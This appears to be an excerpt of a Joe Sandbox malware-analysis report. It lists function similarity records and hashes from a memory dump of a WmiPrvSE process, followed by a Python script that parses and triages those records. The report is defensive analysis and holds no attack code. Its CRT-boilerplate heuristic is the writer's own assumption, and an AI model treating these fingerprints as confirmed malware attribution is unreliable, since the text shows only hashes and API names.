                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: daa48e532976326172583e3a4c571c47417c5d4eaf44e271789a03aca871daf1
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: CCD19A76309B9882DA719B06F49839E7BA0F7D8B84F11011AEACD47BA5DF3CC541CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: f5f8e4336207762ff06b85c0c5e7c1aa6cd79ed60dfa5d07f0cf3e87d149ceda
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 9131B032712BA183EA24DF17F54C7AE67A0FB64B84F094029AE4847B55EF39C4A58700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: dce4a53cde0980e9e7bfa8e5c238c057e3e134f4f123bc0cd4f8d66485bd53a0
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: DE117C307013E083FE65A732B65D7FE62526FB57F4F25172CA8364BBEADE6994418200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: aaa05becb4c794b8857766a330a48a9d678b44623b64567a254f1759be6cd1d3
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 9E015731700B8082EA24DB53B96C7AEA3B1F798BC4F894039DE5943758DF39C989C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 16afa84e82cc86c646f2e738083c556f07bcf6cc28e13af764bfc987c5c61cb4
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 4F011775711B9082FF349B22F92DBAE62B0BB69B86F05442DCA4907764EF3EC5588704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: fbb99a4ca73ed02ef3618f4b3511766aee6ed6129d4346f9d11c6a549c236738
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: EF518A3271A7A08BEF18DF15F44CB9E27A6F364B98F118128DA064378CEB75C841CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 1e00c5c04a80ba1c2bca88dccdd20ab6fe7f7f0abb252079c830c24d101d64d9
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: E7318A3230A7A087EB24DF12F84CB9E7BA5F360B88F058028AE5643789DB39C944C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 54468008fb76d3ceb074340360c7efe810375cd3f49c34f7dcfcdf5d716536ec
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 2AF0443270478192EB709B21F9AC7AE6771F7A8BC8F844028DA4946554DF3DC64DCB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 1f8ee4dff4bd355b026cc7db21423f4b422cb372abe15318a0c4be239f57fa13
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: CDF08270704BD082EA248F13BA2C1AEA271BB58FD0F054039EE5647B18DF3DC4598740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 61dffab3c17364cab24f57077d3ec7b86dbba340f16fca5bb8c7f50fe85359fa
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 3AF06771311B4482EF208B2AF85D7AE6330FBA8BA1F55021DCA6A462E4DF2EC4498350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 948c8bec6fbc4b08e2981e4d1d6d3b02dc10d3ff283c73938789242dd6c4b88b
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 2A02A73261DBD486EB60CB55F49839FB7A1F3D5794F105119EA8E87BA8DB78C884CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 90313672a6e2754a66723f333f78db76843b27ab28469919e333a7b4c8eb3b37
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: 5C619736619B94C7EB608B15F45C36FB7A1F398794F10111AEA8E47BA8EB7CC940CB04
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 070c2ad1e28439dfe6348e1f8a119f9c906d6458a8f3c0467de36e95644402c2
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: EE616732705B948AEB20DF65E4883DE77A1F3A8B88F144219EF4917B98DB38C995C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: e3cc943b61c5eede2163ff4031a19a7949b406678ad233934a46768c194c72e9
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 5B516E773043E08BEF648B16A58C39E77A0F3A4B85F14815EEA994BBD5CB38D850C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: bc674476e9f7a6a1d0bf5a9b290e8843e086fa641938ceb4ebd2d10bd0af943e
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 1BD1E333B14A808AE721CFBAE5483EC3BB1F364799F15421ADE5997B99DB35C40AC340
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: 5032111f951d62ea2bb3c5acc9668f4dfe8daefab9db1ee2bbc544a827910f45
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: EF117C36A00B90CAE724DF63BA1D2AE77B0F7ACF81F054029EA4903716DF35C8588740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 36a833b3bf5a97540ca24a82c186a25b77ac2cdb82885c3ca0b348520cb859d7
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: FD91CE7371065085FB719F76AA9C3FD2BB0B764B89F16410DDE0A67A94DB36C88AC700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 091921a5353eaee6d8d05110a31c67a1cc70bb8c7c926eef7601143a08dd229d
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: BD112E36B10F018AEB10CF61F8693EC33B4F769758F451E25DA6D467A4EB78C5988380
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 95040b388840690fbbe067b36436dc91eace62590150f5e531ba2dbf86a9aef3
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: D551B0327047E183EE749F2AF5AC3EFAA51F3A5B80F45012DDE5903B99DA79C5448B40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 4e90db8bea5616d396187460a7c04a3a7846526dde713a22801b68fa29f860a9
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 4D41A033714A8086DB208F26F95D3EE67A0F7A8794F515029EE4D87794EB7DC445C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: ad116fc72a3c7fe84f58facf7c71bff39f0cc1218aea78dd0e90961d0684afb5
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 99116D32209B8082EB608F15F40839EB7E1F798B98F184225EE8C07768DF3DC555CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 13af758e1a50b9c641cc15e308869bca37880d4444e24b2e310ef6c21fd8b65d
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 06118535B01B9482EA148B67A81C2AE63B0FB98FC0F0940289E4D43766DF38C8429300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 7120a257c749987a1a4265124393983a80deee3e1d4210d0586ba47261f1f13f
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 5EE03935B0160486EB148B63E92D3AA36E1FB9DB06F068028890907351DF7E8899C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
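The entries above are the Joe Sandbox IDA plugin's per-function similarity records for the memory dump taken from WmiPrvSE (process 9). When a dump yields dozens of these, the first triage step is to parse them, collapse functions that share an Opcode ID, and set aside the ones whose strings mark MSVC C runtime boilerplate so attention goes to the remainder. The following is an added example of my own, not code from the report or from Joe Sandbox: the record layout it parses is the one shown above, the four sample records are copied from this section, and the CRT marker list is my own heuristic (the CorExitProcess/mscoree.dll lookup is the CRT exit path, and "csm" is the C++ exception-handling frame magic), not something the report states.

```python
import re
from collections import Counter

# A key/value line looks like "• Source File: ..." or "Uniqueness Score: -1.00%".
# The key is the word-only run before the first colon, the value is the rest.
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?):\s*(.*)$")

# Heuristic assumption: String IDs carrying these tokens belong to MSVC C runtime
# code (CRT exit path, C++ EH frame magic), so such functions are low priority.
CRT_MARKERS = ("CorExitProcess", "mscoree.dll", "csm")

# Four records copied from this report's WmiPrvSE dump section (indentation
# stripped). Any number of records in this layout can be fed to parse_records().
SAMPLE = """\
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
• Instruction ID: 61dffab3c17364cab24f57077d3ec7b86dbba340f16fca5bb8c7f50fe85359fa
• Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
• Instruction Fuzzy Hash: 3AF06771311B4482EF208B2AF85D7AE6330FBA8BA1F55021DCA6A462E4DF2EC4498350
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
• Instruction ID: 948c8bec6fbc4b08e2981e4d1d6d3b02dc10d3ff283c73938789242dd6c4b88b
• Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
• Instruction Fuzzy Hash: 2A02A73261DBD486EB60CB55F49839FB7A1F3D5794F105119EA8E87BA8DB78C884CB00
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
• Instruction ID: 90313672a6e2754a66723f333f78db76843b27ab28469919e333a7b4c8eb3b37
• Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
• Instruction Fuzzy Hash: 5C619736619B94C7EB608B15F45C36FB7A1F398794F10111AEA8E47BA8EB7CC940CB04
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction ID: e3cc943b61c5eede2163ff4031a19a7949b406678ad233934a46768c194c72e9
• Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction Fuzzy Hash: 5B516E773043E08BEF648B16A58C39E77A0F3A4B85F14815EEA994BBD5CB38D850C700
Uniqueness

Uniqueness Score: -1.00%
"""


def parse_records(text):
    """Return one dict per record. A record starts at a 'Memory Dump Source'
    line; bullet key/value lines and the 'Uniqueness Score' line fill it."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            if key == "Uniqueness Score":
                value = float(value.rstrip("%"))
            cur[key] = value
    return records


def unique_by_opcode(records):
    """Collapse records that share an Opcode ID (identical function bodies)."""
    seen = {}
    for r in records:
        seen.setdefault(r.get("Opcode ID"), r)
    return list(seen.values())


def api_histogram(records):
    """Count how often each API ID (the API set a function calls) occurs."""
    return Counter(r.get("API ID", "") for r in records)


def crt_boilerplate(records):
    """Records whose '$'-joined String ID contains a CRT marker token."""
    return [r for r in records
            if any(s in CRT_MARKERS for s in r.get("String ID", "").split("$"))]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records,", len(unique_by_opcode(recs)), "distinct opcode IDs")
    for api, n in api_histogram(recs).most_common():
        print(f"{n:3d}  {api}")
    for r in crt_boilerplate(recs):
        print("CRT boilerplate:", r["API ID"], "|", r["String ID"])
```

Only the String ID and Opcode ID fields are used for the triage decisions; the fuzzy hashes are parsed but left untouched, since comparing them needs the plugin's own similarity scoring, which the report does not expose here.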